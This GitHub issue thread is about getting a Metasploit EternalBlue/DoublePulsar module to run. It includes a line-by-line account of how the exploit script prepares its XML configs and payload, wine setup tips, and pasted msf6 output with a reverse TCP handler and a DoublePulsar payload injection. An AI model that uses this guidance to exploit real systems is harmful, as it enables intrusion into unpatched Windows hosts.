Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks

Failed to load module #73

Open Jortsyy opened 6 years ago

Jortsyy commented 6 years ago

Whenever I use the command use exploit/windows/smb/eternalblue_doublepulsar

it gives me an error saying: "failed to load module: exploit/windows/smb/eternalblue_doublepulsar"

I moved the rb file to the windows.smb directory, so I don't know what to do.

peterpt commented 6 years ago

The problem is not the module itself; this module is not running in msf5, latest git. My first guess is the required dependency msfcore at the start of the ruby script. However, the guys here did an excellent job decoding how the xml files for eternalblue and doublepulsar should be written to exploit the target. By looking into the ruby script it is easy to see that before launching those exes with wine, they copy the skeleton xml files to their final name and change the values that the user has written in the metasploit module, like rhost, timeout, target, etc. Any bash script with sed to change those values like they did and creating the payloads with those bad chars is enough to run the doublepulsar implant with eternalblue.exe and running the doublepulsar.exe ahead to call the backdoor and inject the payload. It is pretty simple.

I hope they find the xml tricks to do all the other executables in the package. Thinking a bit more on it, basically it is just needed to run the fuzzbunch package with some target with smb vulnerable and the original python scripts will do the work that I am asking of Elevenpaths.

Look here : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

Some simple explanation:

Line 24: this is for the payload that metasploit will create
Line 67: they do the copy of the skeleton file
Lines 68, 69, 70: they write in the eternalblue.xml file the rhost, rport & timeout values
Line 74: defines the target for W7, 2008 & Vista with value WIN72K8R2 in the xml
Line 76: defines everything else, XP, Server 2003, with XP value in the xml
Line 79: they write one of those values in the xml file
Lines 82 to 91: they do the same for the doublepulsar config
Lines 95 to 101: they create the payload for doublepulsar to inject on the target
Line 106: they launch "wine Eternalblue-2.2.0.exe" and wait for the output of it
Line 107: checks the output, whether it returned successfully or not, and shows you the message
Line 115: they launch doublepulsar with wine and also wait for the output

The code is pretty simple; basically it is almost like copying all of it and pasting it into a bash script with some adapted changes, and it will run perfectly.

AtharavRH commented 4 years ago

Hey peterpt, I am really very thankful for this info... I am still not that pro... I request you to please, please elaborate on how to fix this... I have been stuck on this error for 4 days... Any mastermind here? Please help me. Thanks a lot, may God bless you, and have a nice day in advance.

peterpt commented 4 years ago

First of all you need wine 32bit installed; if your system is running wine 64 bit then it will not be able to run the executables from fuzzbunch. Watch this video:

https://www.youtube.com/watch?v=dJi5Dshaz-g

AtharavRH commented 4 years ago

I am running it on Kali Linux.

peterpt commented 4 years ago

It is the same procedure; the only difference is that if you installed metasploit framework from apt, or it is already installed, then metasploit should be in the /usr/local/share/metasploit-framework directory. You have to look for it in your system. Sorry, I don't use kali linux; I only installed their kernel to have access to their patched wireless drivers, all other stuff is devuan linux, including the system init.

Get https://github.com/peterpt/eternal_check and run it. Eternal check does not exploit, it only checks if an ip is vulnerable to what double pulsar exploits; however, when you get eternal check working then this exploit will work too. The only difference is that eternal check warns you of what you must do to make it work.

lilplucky commented 3 years ago

Hey people, I need your help in getting this to work.

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.43.95:4444
[*] 192.168.43.92:445 - Generating Eternalblue XML data
[*] 192.168.43.92:445 - Generating Doublepulsar XML data
[*] 192.168.43.92:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.92:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.92:445 - Launching Eternalblue...
0030:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b).
0030:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b).
0030:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142
[+] 192.168.43.92:445 - Backdoor is already installed
[*] 192.168.43.92:445 - Launching Doublepulsar...
002f:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b).
002f:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b).
002f:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142
[+] 192.168.43.92:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/eternalblue_doublepulsar) >

peterpt commented 3 years ago

You have a wine installation issue; make sure you select wine windows emulation OS winxp or 7 32bit.